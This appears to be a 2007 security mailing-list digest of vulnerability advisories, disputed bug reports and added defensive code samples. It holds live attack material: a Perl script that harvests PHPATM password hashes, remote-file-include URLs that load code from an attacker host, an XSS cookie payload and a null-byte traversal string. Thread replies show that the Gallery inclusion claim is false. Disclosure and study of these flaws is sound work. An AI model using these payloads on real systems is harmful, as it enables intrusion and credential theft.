[ GLSA 200701-10 ] WordPress: Multiple vulnerabilities

2007-01-16 Thread Raphael Marichez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200701-10
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: WordPress: Multiple vulnerabilities
      Date: January 15, 2007
      Bugs: #159229
        ID: 200701-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

WordPress is vulnerable to SQL injection, information disclosure, and
cross-site scripting attacks.

Background
==========

WordPress is a popular personal publishing platform with a web
interface.

Affected packages
=================

    -------------------------------------------------------------------
     Package                     /  Vulnerable  /           Unaffected
    -------------------------------------------------------------------
  1  www-apps/wordpress               < 2.0.6                  >= 2.0.6

Description
===========

When decoding trackbacks with alternate character sets, WordPress does
not correctly sanitize the entries before further modifying a SQL
query. WordPress also displays different error messages in wp-login.php
based upon whether or not a user exists. David Kierznowski has
discovered that WordPress fails to properly sanitize recent file
information in /wp-admin/templates.php before sending that information
to a browser.

Impact
======

An attacker could inject arbitrary SQL into WordPress database queries.
An attacker could also determine if a WordPress user existed by trying
to login as that user, better facilitating brute force attacks. Lastly,
an attacker authenticated to view the administrative section of a
WordPress instance could try to edit a file with a malicious filename;
this may cause arbitrary HTML or JavaScript to be executed in users'
browsers viewing /wp-admin/templates.php.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All WordPress users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=www-apps/wordpress-2.0.6"

References
==========

  [ 1 ] CVE-2006-6808
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6808
  [ 2 ] CVE-2007-0107
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0107
  [ 3 ] CVE-2007-0109
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0109

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200701-10.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
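The second issue in the advisory, wp-login.php answering with a different error depending on whether the username exists, is easy to reproduce in miniature. The following is an added example (not WordPress code and not part of the GLSA): a made-up user table, a login routine that leaks existence the way the advisory describes, a hardened one that returns a single failure message and always pays the hashing cost for unknown names (so timing does not become the next oracle), and the check a tester would run against either. The account name, password, salt and iteration count are constructed for the example.

```python
import hashlib
import hmac

# Constructed sample user table: username -> (salt, PBKDF2-SHA256 hash).
# These are made-up test accounts, not data from any WordPress install.
def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 10_000)

_SALT = b"\x00" * 16  # fixed salt only so the example is reproducible
USERS = {"admin": (_SALT, _hash("correct horse", _SALT))}

# Dummy hash so a lookup of an unknown user costs the same work as a real one.
_DUMMY = _hash("dummy", _SALT)


def login_vulnerable(username: str, password: str) -> str:
    """Two different failure messages: the pattern the advisory describes.
    A caller learns whether `username` exists without knowing any password."""
    if username not in USERS:
        return "Error: wrong username"
    salt, stored = USERS[username]
    if not hmac.compare_digest(_hash(password, salt), stored):
        return "Error: incorrect password"
    return "OK"


def login_hardened(username: str, password: str) -> str:
    """One message for both failure modes, and the hash is computed every time
    so the response time does not distinguish the two cases either."""
    salt, stored = USERS.get(username, (_SALT, _DUMMY))
    matched = hmac.compare_digest(_hash(password, salt), stored)
    if matched and username in USERS:
        return "OK"
    return "Error: invalid username or password"


def leaks_user_existence(login) -> bool:
    """Tester's oracle check: does a bogus username get a different reply
    than a valid username with a wrong password?"""
    return login("nosuchuser", "x") != login("admin", "x")
```

The check is the same one you would run over HTTP against a real login form: submit a name that cannot exist and a name you know exists, both with a wrong password, and diff the two responses (body and, ideally, timing).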




Gallery <= 1.4.4-pl4 (phpbb_root_path) Remote File Include Vulnerability

2007-01-16 Thread me you

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Gallery <= 1.4.4-pl4 (phpbb_root_path) Remote File Include Vulnerability

Script : Gallery

Version : 1.4.4-pl4

URL : 
http://puzzle.dl.sourceforge.net/sourceforge/gallery/gallery-1.6-alpha3.tar.gz


Author : BorN To K!LL

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Code in :.contrib/phpBB2/modules.php

include_once($phpbb_root_path . 'extension.inc');
include_once($phpbb_root_path . 'common.'.$phpEx);
include_once($phpbb_root_path . 'includes/functions.'.$phpEx);

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Explo!t :.
^
www.site.com/[path]/contrib/phpBB2/modules.php?phpbb_root_path=shellcode.txt?

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

GreeTz to :  Dr.2  ,  Asbmay  ,  General C  ,  ToOoFa  ,  SHiKaA  ,  str0ke 
...


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=





PHPATM Remote Password Disclosure Vulnerablity

2007-01-16 Thread nightmare
Hi
Application : php advanced transfer manager
Vulnerability Kind : Remote Password Hash Discloure
Product Link : phpatm.free.fr
version : All Versions Affected
mail: [EMAIL PROTECTED]
Author : Black-0ut

exploit :

#!/usr/bin/perl
##############################################################
##                                                          ##
#   [EMAIL PROTECTED]@[EMAIL PROTECTED] Security Team         #
#   Coded & Discovered by Red_Dragon                         #
##############################################################
use strict;
use warnings;
use LWP::Simple;

# Usage: perl phpatm.pl <host> </path/to/phpatm/> <username>
my ($ha, $pa, $ur) = @ARGV;
if (!$ARGV[1]) {
    print "\n";
    print "[+] Coded By Red_Dragon or H3CT0R3   [+]\n";
    print "[+] KAYVANIRAN IT AND SECURITY TEAM  [+]\n";
    print "[+] http://onhackerline.ir/          [+]\n";
    print "[+] Black 0ut Frenzy Team            [+]\n";
    print "\n";
    print "ex : www.ex.com /path/ USER\n";
    exit;
}

# PHPATM keeps one account file per user under users/<name>; when the web
# server serves that directory, the file (and the MD5 password hash in it)
# can be fetched directly without authentication.
my $vul   = "users/" . $ur;
my $start = get("http://" . $ha . $pa . $vul) || die "[-] Unable to retrieve: $!";
print "\n";
print "[+] Connected to : $ha\n";
if ($start =~ m/([a-f0-9]{32})/) {
    print "[+] Username : $ur\n";
    print "[+] MD5 Hash : $1\n";
} else {
    print "[-] No MD5 hash found in the response\n";
}
TNX



[ MDKSA-2007:017 ] - Updated wget packages fix ftp vulnerability

2007-01-16 Thread security

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:017
 http://www.mandriva.com/security/
 ___
 
 Package : wget
 Date: January 15, 2007
 Affected: 2006.0, 2007.0, Corporate 3.0, Corporate 4.0,
   Multi Network Firewall 2.0
 ___
 
 Problem Description:
 
 The ftp_syst function in ftp-basic.c in Free Software Foundation (FSF)
 GNU wget 1.10.2 allows remote attackers to cause a denial of service
 (application crash) via a malicious FTP server with a large number of
 blank 220 responses to the SYST command.

 The updated packages have been patched to correct this problem.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6719
 ___
 
 Updated Packages:
 
 Mandriva Linux 2006.0:
 8f5fbe5fa003b203c5be4f65c72eafef  2006.0/i586/wget-1.10-1.2.20060mdk.i586.rpm 
 7bbe865186503532dc5fa194240167c0  2006.0/SRPMS/wget-1.10-1.2.20060mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 a70b537b39d5397cb142b20bba55b6f5  
2006.0/x86_64/wget-1.10-1.2.20060mdk.x86_64.rpm 
 7bbe865186503532dc5fa194240167c0  2006.0/SRPMS/wget-1.10-1.2.20060mdk.src.rpm

 Mandriva Linux 2007.0:
 c6331e96c0180a6fb364c4dd0d824bad  
2007.0/i586/wget-1.10.2-3.1mdv2007.0.i586.rpm 
 53d0cfe5e83b5126d89963611dbe0196  2007.0/SRPMS/wget-1.10.2-3.1mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 b7826d019cb0bd54c8f59007566db782  
2007.0/x86_64/wget-1.10.2-3.1mdv2007.0.x86_64.rpm 
 53d0cfe5e83b5126d89963611dbe0196  2007.0/SRPMS/wget-1.10.2-3.1mdv2007.0.src.rpm

 Corporate 3.0:
 485d33aa6d44eedd9ae0fa41e6e1159d  
corporate/3.0/i586/wget-1.9.1-4.4.C30mdk.i586.rpm 
 6765dc9c586b7520a87e619095475a9b  
corporate/3.0/SRPMS/wget-1.9.1-4.4.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 4c64e7dfc485a04c4fd38d6f492d7e34  
corporate/3.0/x86_64/wget-1.9.1-4.4.C30mdk.x86_64.rpm 
 6765dc9c586b7520a87e619095475a9b  
corporate/3.0/SRPMS/wget-1.9.1-4.4.C30mdk.src.rpm

 Corporate 4.0:
 8050181ba71182203403e7d3b12b7922  
corporate/4.0/i586/wget-1.10-1.2.20060mlcs4.i586.rpm 
 730e722809170908e017844728f87c86  
corporate/4.0/SRPMS/wget-1.10-1.2.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 0be58a7ab8d999489b311fa12bf2e5d4  
corporate/4.0/x86_64/wget-1.10-1.2.20060mlcs4.x86_64.rpm 
 730e722809170908e017844728f87c86  
corporate/4.0/SRPMS/wget-1.10-1.2.20060mlcs4.src.rpm

 Multi Network Firewall 2.0:
 31945b27c8a8777a7c2c55bbf12eff73  mnf/2.0/i586/wget-1.9.1-4.4.M20mdk.i586.rpm 
 6c94e26ee057c849a1a4f01b6777f818  mnf/2.0/SRPMS/wget-1.9.1-4.4.M20mdk.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFFq/x+mqjQ0CJFipgRAnAiAJ47ZEJJrBiYZ74Z5I8nRNQjrRWj2wCfbSH1
FdqJ7ySHKajIZHxZqVbozx8=
=DZk/
-----END PGP SIGNATURE-----



[KDE Security Advisory] kpdf/kword/xpdf denial of service vulnerability

2007-01-16 Thread Dirk Mueller

KDE Security Advisory: kpdf/kword/xpdf denial of service vulnerability
Original Release Date: 2007-01-15
URL: http://www.kde.org/info/security/advisory-20070115-1.txt

0. References
CVE-2007-0104


1. Systems affected:

KDE 3.2.0 up to including KDE 3.5.5. KDE 3.5.6 and newer is
not affected. KOffice 1.2 and newer contain the same code.


2. Overview:

kpdf, the KDE pdf viewer, shares code with xpdf. xpdf contains
a vulnerability that can cause denial of service (infinite loop)
via a PDF file that contains a crafted catalog dictionary
or a crafted Pages attribute that references an invalid page
tree node.


3. Impact:

Remotely supplied pdf files can be used to disrupt the kpdf
viewer on the client machine.


4. Solution:

Source code patches have been made available which fix these
vulnerabilities. Contact your OS vendor / binary package provider
for information about how to obtain updated binary packages.


5. Patch:

Patch for KOffice 1.2.1 and newer is available from 
ftp://ftp.kde.org/pub/kde/security_patches :

dc28881c39f11c040f8c942e4af238d1  koffce-xpdf-CVE-2007-0104.diff

Patch for KDE 3.3.2 and newer is available from 
ftp://ftp.kde.org/pub/kde/security_patches :

a690ce46117257609c2b43485ea4d0d7  
post-3.5.5-kdegraphics-CVE-2007-0104.diff

Patch for KDE 3.2.3 and newer is available from 
ftp://ftp.kde.org/pub/kde/security_patches :

c2d4c2aa3aa990e2dba00f782a140a1b  
post-3.2.3-kdegraphics-CVE-2007-0104.diff
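The failure mode in this advisory, a page tree whose Kids or Pages reference loops back on itself or points at an object that is not there, is a generic one for any tree walker over attacker-supplied references. The block below is an added example (not xpdf or kpdf code, and not the patch above) that walks a toy PDF object table and refuses cycles, dangling references and runaway depth instead of looping forever. The object model (a dict of object numbers to dictionaries, with indirect references written as ("ref", n)), the sample files and the depth limit are all constructed for the example.

```python
# Toy cross-reference table: {object_number: dictionary}. Indirect references
# are ("ref", object_number). Constructed for this example; not a PDF parser.

def walk_pages(objects, catalog_num, max_depth=64):
    """Return the page object numbers in document order, rejecting a malformed
    catalog, a dangling reference, a cycle, or a tree deeper than max_depth."""

    def deref(ref):
        if not (isinstance(ref, tuple) and len(ref) == 2 and ref[0] == "ref"):
            raise ValueError("expected indirect reference, got %r" % (ref,))
        if ref[1] not in objects:
            raise ValueError("dangling reference to object %d" % ref[1])
        return ref[1], objects[ref[1]]

    catalog = objects.get(catalog_num)
    if (not isinstance(catalog, dict) or catalog.get("Type") != "Catalog"
            or "Pages" not in catalog):
        raise ValueError("invalid catalog dictionary")

    pages, visited = [], set()

    def visit(ref, depth):
        num, node = deref(ref)
        if num in visited:                      # same node reached twice: a loop
            raise ValueError("cycle in page tree at object %d" % num)
        if depth > max_depth:                   # bounded even without a cycle
            raise ValueError("page tree deeper than %d levels" % max_depth)
        visited.add(num)
        kind = node.get("Type")
        if kind == "Page":
            pages.append(num)
        elif kind == "Pages":
            for kid in node.get("Kids", []):
                visit(kid, depth + 1)
        else:
            raise ValueError("object %d is not a page tree node" % num)

    visit(catalog["Pages"], 0)
    return pages


def walk_error(objects, catalog_num):
    """Rejection message for a bad file, or None if the tree walks cleanly."""
    try:
        walk_pages(objects, catalog_num)
    except ValueError as e:
        return str(e)
    return None


# Constructed sample files.
GOOD = {
    1: {"Type": "Catalog", "Pages": ("ref", 2)},
    2: {"Type": "Pages", "Kids": [("ref", 3), ("ref", 4)]},
    3: {"Type": "Page"},
    4: {"Type": "Pages", "Kids": [("ref", 5)]},
    5: {"Type": "Page"},
}
# Crafted: the root Pages node lists itself as a kid; a naive recursive walker never returns.
LOOPING = {
    1: {"Type": "Catalog", "Pages": ("ref", 2)},
    2: {"Type": "Pages", "Kids": [("ref", 3), ("ref", 2)]},
    3: {"Type": "Page"},
}
# Crafted: /Pages names an object number that does not exist in the file.
DANGLING = {1: {"Type": "Catalog", "Pages": ("ref", 99)}}
# Crafted: catalog dictionary without a /Pages entry.
BAD_CATALOG = {1: {"Type": "Catalog"}}
```

The visited set is what turns an infinite loop into a one-line error; the depth cap is the belt to that suspender, since a long non-cyclic chain of single-kid Pages nodes would otherwise still exhaust the stack.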




[ MDKSA-2007:016 ] - Updated fetchmail packages fix vulnerability

2007-01-16 Thread security

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:016
 http://www.mandriva.com/security/
 ___
 
 Package : fetchmail
 Date: January 15, 2007
 Affected: 2006.0, 2007.0, Corporate 3.0, Corporate 4.0
 ___
 
 Problem Description:
 
 Fetchmail before 6.3.6-rc4 does not properly enforce TLS and may
 transmit cleartext passwords over unsecured links if certain
 circumstances occur, which allows remote attackers to obtain sensitive
 information via man-in-the-middle (MITM) attacks.

 The updated packages have been patched to correct this problem.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2006-5867
 ___
 
 Updated Packages:
 
 Mandriva Linux 2006.0:
 a18ed6ffe44795de4207b12b4b4f7e4d  
2006.0/i586/fetchmail-6.2.5-11.3.20060mdk.i586.rpm
 ddfdd7544b80650b3bf8d1d84abd5cbe  
2006.0/i586/fetchmail-daemon-6.2.5-11.3.20060mdk.i586.rpm
 a310ecd2fef17d265c688c62478fc0b2  
2006.0/i586/fetchmailconf-6.2.5-11.3.20060mdk.i586.rpm 
 1ac8f74cfcea74d41699bcea680b4cdd  
2006.0/SRPMS/fetchmail-6.2.5-11.3.20060mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 f762e2e7752e4a0c2954b222728f35f1  
2006.0/x86_64/fetchmail-6.2.5-11.3.20060mdk.x86_64.rpm
 9a3afcab894242dedb352be782c810f3  
2006.0/x86_64/fetchmail-daemon-6.2.5-11.3.20060mdk.x86_64.rpm
 6ab3758219b64100c73b34ddcb461d35  
2006.0/x86_64/fetchmailconf-6.2.5-11.3.20060mdk.x86_64.rpm 
 1ac8f74cfcea74d41699bcea680b4cdd  
2006.0/SRPMS/fetchmail-6.2.5-11.3.20060mdk.src.rpm

 Mandriva Linux 2007.0:
 00e5ff3f7e0d33f2c9ccc39667e01238  
2007.0/i586/fetchmail-6.3.4-3.1mdv2007.0.i586.rpm
 029afb1de6f50c98ef7993b97fe89524  
2007.0/i586/fetchmail-daemon-6.3.4-3.1mdv2007.0.i586.rpm
 fbf0828751dc8ac2a42c471a2deccaba  
2007.0/i586/fetchmailconf-6.3.4-3.1mdv2007.0.i586.rpm 
 01a836a578f0f1629eea747d79aabf2e  
2007.0/SRPMS/fetchmail-6.3.4-3.1mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 d59d414b0afdcb0bc25fde8b4e7e4397  
2007.0/x86_64/fetchmail-6.3.4-3.1mdv2007.0.x86_64.rpm
 3f7a039d209f8f41e44e17daf18ff5bf  
2007.0/x86_64/fetchmail-daemon-6.3.4-3.1mdv2007.0.x86_64.rpm
 eae3948818dac3a5ecec8530fd27b9df  
2007.0/x86_64/fetchmailconf-6.3.4-3.1mdv2007.0.x86_64.rpm 
 01a836a578f0f1629eea747d79aabf2e  
2007.0/SRPMS/fetchmail-6.3.4-3.1mdv2007.0.src.rpm

 Corporate 3.0:
 1f0b013294c63425978e953ac25873cf  
corporate/3.0/i586/fetchmail-6.2.5-3.4.C30mdk.i586.rpm
 06eb2b920279a7ae2e46396d8e81b032  
corporate/3.0/i586/fetchmail-daemon-6.2.5-3.4.C30mdk.i586.rpm
 d9124e109996d99a69dc87724e753994  
corporate/3.0/i586/fetchmailconf-6.2.5-3.4.C30mdk.i586.rpm 
 62b8c91fa6d6d3a1f31c2fda11027554  
corporate/3.0/SRPMS/fetchmail-6.2.5-3.4.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 dd09c3c7098e6f6d96221cc3880ddcfb  
corporate/3.0/x86_64/fetchmail-6.2.5-3.4.C30mdk.x86_64.rpm
 2e088587891d22fa8e6937e58a5a52f5  
corporate/3.0/x86_64/fetchmail-daemon-6.2.5-3.4.C30mdk.x86_64.rpm
 7067aa53deb5fb0320577f78125d0464  
corporate/3.0/x86_64/fetchmailconf-6.2.5-3.4.C30mdk.x86_64.rpm 
 62b8c91fa6d6d3a1f31c2fda11027554  
corporate/3.0/SRPMS/fetchmail-6.2.5-3.4.C30mdk.src.rpm

 Corporate 4.0:
 7f9ad01da70611e6e78a4ddad78aafb3  
corporate/4.0/i586/fetchmail-6.2.5-11.3.20060mlcs4.i586.rpm
 f33c0f64095ce82e41a45795c4f1c349  
corporate/4.0/i586/fetchmail-daemon-6.2.5-11.3.20060mlcs4.i586.rpm
 8a1cf9fc1900e6f93edc4d111618c640  
corporate/4.0/i586/fetchmailconf-6.2.5-11.3.20060mlcs4.i586.rpm 
 eed734d10397d929782e5471f46dcb21  
corporate/4.0/SRPMS/fetchmail-6.2.5-11.3.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 022aa138f270c935d05c67c87a4add31  
corporate/4.0/x86_64/fetchmail-6.2.5-11.3.20060mlcs4.x86_64.rpm
 11a617dcb9e5c9c5848446f86f2ae939  
corporate/4.0/x86_64/fetchmail-daemon-6.2.5-11.3.20060mlcs4.x86_64.rpm
 0aaeedf0144abca7db1bdb20cbec04f2  
corporate/4.0/x86_64/fetchmailconf-6.2.5-11.3.20060mlcs4.x86_64.rpm 
 eed734d10397d929782e5471f46dcb21  
corporate/4.0/SRPMS/fetchmail-6.2.5-11.3.20060mlcs4.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   

dt_guestbook version 1.0f XSS vulnerability

2007-01-16 Thread jesper . jurcenoks
netVigilance Security Advisory #10

dt_guestbook version 1.0f XSS vulnerability 

Description:
dt_guestbook is a fully-featured message board system with an admin interface. Due 
to program flaws it is possible for a remote attacker to conduct XSS attacks.
The remote attacker can convince the victim to open a specially crafted link 
to a trusted guestbook server and execute arbitrary code in the user’s 
browser session.

External References: 
Mitre CVE: CVE-2006-6487 
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6487 
NVD NIST: CVE-2006-6487 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2006-6487
OSVDB: 30787 http://www.osvdb.com/displayvuln.php?osvdb_id=30787

Summary: 
dt_guestbook is a fully-featured message board system with an admin interface. 
A security problem in the product allows attackers to conduct XSS attacks. 
This vulnerability can be exploited only when PHP register_globals is On.

Release Date:
 

Severity:
Risk: Medium
 
CVSS Metrics
Access Vector: Remote
Access Complexity: High
Authentication: not-required
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: Partial
Impact Bias: Normal
CVSS Base Score: 5.6
 
Target Distribution on Internet: Low
 
Exploitability: Functional Exploit
Remediation Level: Workaround
Report Confidence: Uncorroborated
 
Vulnerability Impact: Attack
Host Impact: cross-site scripting.


SecureScout Testcase ID:
TC 17940


Vulnerable Systems:
dt_guestbook 1.0f.

Vulnerability Type:
XSS (Cross-Site Scripting) to force a web-site to display malicious contents to 
the target, by sending a specially crafted request to the web-site. The 
vulnerable web-site is not the target of attack but is used as a tool for the 
hacker in the attack of the victim.

Vendor Status: Author Alexander Fedorov was notified on Dec 8 2006 and agreed 
to correct the XSS in his product. He has failed to respond to emails or Chat 
since Dec 8 2006.

Solution: Patch Possibly Pending from Vendor, please check 
http://fedorov.vitalain.ru for updates.

Workaround:
Set PHP register_globals to Off.

Example: 
HTTP REQUEST 
http://[TARGET]/[dt_guestbook_v1-directory]/index.php?submit=1&error[]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
REPLY
...
will execute <script>alert(document.cookie)</script>
... 

Advisory URL: http://www.netvigilance.com/advisory0009 

Credits: 
Jesper Jurcenoks
Co-founder netVigilance, Inc
www.netvigilance.com
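The advisory gives its CVSS metrics but not the arithmetic behind the 5.6. These are CVSS version 1 metrics (the v1 vocabulary of Impact Bias and "not-required" authentication), and the v1 base equation is 10 * AccessVector * AccessComplexity * Authentication * (C * Cbias + I * Ibias + A * Abias), rounded to one decimal. The block below is an added example, not netVigilance's tool, that parses the metric block as printed above and recomputes the score; the weight tables are the CVSS v1 values as the editor recalls them from the specification and should be checked against it before reuse.

```python
# CVSS v1 base-score weights (as given in the CVSS v1 specification).
ACCESS_VECTOR = {"local": 0.7, "remote": 1.0}
ACCESS_COMPLEXITY = {"high": 0.8, "low": 1.0}
AUTHENTICATION = {"required": 0.6, "not-required": 1.0}
IMPACT = {"none": 0.0, "partial": 0.7, "complete": 1.0}
# Impact Bias: weights for (Confidentiality, Integrity, Availability).
IMPACT_BIAS = {
    "normal": (0.333, 0.333, 0.333),
    "confidentiality": (0.5, 0.25, 0.25),
    "integrity": (0.25, 0.5, 0.25),
    "availability": (0.25, 0.25, 0.5),
}

# The metric block exactly as it appears in the netVigilance advisory above.
ADVISORY_METRICS = """\
Access Vector: Remote
Access Complexity: High
Authentication: not-required
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: Partial
Impact Bias: Normal
"""


def parse_metrics(text):
    """Turn 'Name: Value' lines into a lower-cased dict; other lines are ignored."""
    metrics = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            metrics[key.strip().lower()] = value.strip().lower()
    return metrics


def cvss1_base(m):
    """CVSS v1 base score for a parsed metric dict, rounded to one decimal."""
    wc, wi, wa = IMPACT_BIAS[m["impact bias"]]
    impact = (IMPACT[m["confidentiality impact"]] * wc
              + IMPACT[m["integrity impact"]] * wi
              + IMPACT[m["availability impact"]] * wa)
    raw = (10
           * ACCESS_VECTOR[m["access vector"]]
           * ACCESS_COMPLEXITY[m["access complexity"]]
           * AUTHENTICATION[m["authentication"]]
           * impact)
    return round(raw, 1)


def advisory_score(text=ADVISORY_METRICS):
    return cvss1_base(parse_metrics(text))
```

For the advisory's metrics this is 10 * 1.0 * 0.8 * 1.0 * (0.7 * 0.333 * 3) = 5.5944, which rounds to the published 5.6; the 0.8 is the "Access Complexity: High" factor that reflects the register_globals precondition, and with Low complexity the same impacts would score 7.0.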


rPSA-2007-0007-1 kdenetwork

2007-01-16 Thread rPath Update Announcements
rPath Security Advisory: 2007-0007-1
Published: 2007-01-15
Products: rPath Linux 1
Rating: Informational
Exposure Level Classification:
Indirect User Deterministic Denial of Service
Updated Versions:
kdenetwork=/[EMAIL PROTECTED]:devel//1/3.4.2-3.3-1

References:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6811
https://issues.rpath.com/browse/RPL-922

Description:
Previous versions of the kdenetwork package contain a ksirc program
which can crash due to an incorrect assertion, if it talks to a
malicious IRC server or connects to a malicious man-in-the-middle
when talking to an IRC server.


Re: Gallery <= 1.4.4-pl4 (phpbb_root_path) Remote File Include Vulnerability

2007-01-16 Thread Chris Kelly
Gallery 1.4.4-pl4 and all versions of Gallery 1 more recent than this  
(I didn't check older versions as they are over 2 years old) are  
actually not vulnerable to this.  The actual code in contrib/phpBB2/ 
modules.php is:


   42   $phpbb_root_path = "./";
   43   // connect to phpbb
   44   include_once($phpbb_root_path . 'extension.inc');
   45   include_once($phpbb_root_path . 'common.'.$phpEx);
   46   include_once($phpbb_root_path . 'includes/functions.'.$phpEx);

which defines phpbb_root_path first. Overwriting this through a get  
parameter would do no good because of line 42, and by default Gallery  
1 refuses to install if register_globals is enabled which should  
prevent the reported problem even if line 42 is not included.


Source code for reference:

1.4.4-pl4:
http://gallery.svn.sourceforge.net/viewvc/gallery/tags/ 
RELEASE_1_4_4_PL4/gallery/contrib/phpBB2/modules.php?view=markup


Current 1.5 branch (most up to date Gallery 1.5 versions, current  
stable version)
http://gallery.svn.sourceforge.net/viewvc/gallery/branches/ 
BRANCH_1_5_LEGACY/gallery/contrib/phpBB2/modules.php?view=markup


SVN trunk (current development, current 1.6-alpha3 and future release  
candidates)
http://gallery.svn.sourceforge.net/viewvc/gallery/trunk/gallery/ 
contrib/phpBB2/modules.php?view=markup



-Chris
Gallery Project Manager

--
Chris Kelly
[EMAIL PROTECTED]
http://ckdake.com/


On Jan 16, 2007, at 8:52 AM, me you wrote:

[quoted in full: the original "Gallery <= 1.4.4-pl4 (phpbb_root_path) Remote File Include Vulnerability" post reproduced above]






Announcement: The Cross-site Request Forgery FAQ

2007-01-16 Thread bugtraq
 The Cross-site Request Forgery FAQ has been released to address some of the 
common 
 questions and misconceptions regarding this commonly misunderstood web flaw.   
  
 URL: The Cross-site Request Forgery FAQ 
 http://www.cgisecurity.com/articles/csrf-faq.shtml 
  
  
 Regards, 
  
 - Robert 
 [EMAIL PROTECTED] 
 http://www.cgisecurity.com/ 
 http://www.qasec.com/ 
 http://www.webappsec.org/ 
 


Re: Gallery <= 1.4.4-pl4 (phpbb_root_path) Remote File Include Vulnerability

2007-01-16 Thread krasza
Hi,
Yeah ,  you are the best ;[
P.S:It is fake bug, because 
(...)

$phpbb_root_path = "./";

(...)
(http://www.google.com/codesearch?hl=plq=show:QzeIQQZQ7BQ:h8q8TE-XBMQ:Ex0tElneoM4sa=Nct=rdcs_p=http://www.pottum.nl/gallery_web/gallery-1.4.4-pl4-sms9.tar.gzcs_f=gallery/contrib/phpBB2/modules.php)

P.S2:When you publish something like that, I say What an idiot!?
-- 
Best degradation , Maciej `krasza` Kukla


Re: Jax Petition Book (languagepack) Remote File Include Vulnerabilities

2007-01-16 Thread John McGuire
Actually, this can be pretty serious depending on server settings, but 
an improper example was given.


Better one:

jax_petitionbook.php?languagepack=../../some_other_allowed_file_uploads/myfile.php.gif%00


Many servers will have magic quotes on to defeat the null byte, but by no means 
all.

John



[EMAIL PROTECTED] wrote:


This is not a vulnerability. Since $languagepack is prefixed by language/,
the PHP stream handler will simply try to open a local file. Also, you can
only modify $languagepack if register_globals is on, which, it rarely is
these days.

Can we stop with the PHP 'vulnerabilities' that aren't?

-Blake

Whatchu talkin' 'bout, Willis?
 


--

AYYILDIZ.ORG PreSents...


*Script: Jax Petition Book
*Download: jtr.de/scripting/php/guestbook/petitionbook%20v1.0.3.06.zip

*Contact: ilker Kandemir ilkerkandemir[at]mynet.com

---

*Code:

require ( "language/" . $languagepack . ".inc.php" );

---

*Exploit: 


jax_petitionbook.php?languagepack=http://attacker.txt?
smileys.php?languagepack=http://attacker.txt?

---

Tnx:H0tturk,Dr.Max Virus,Asianeagle,PcDelisi,CodeR,Dum?nci
Special Tnx: AYYILDIZ.ORG
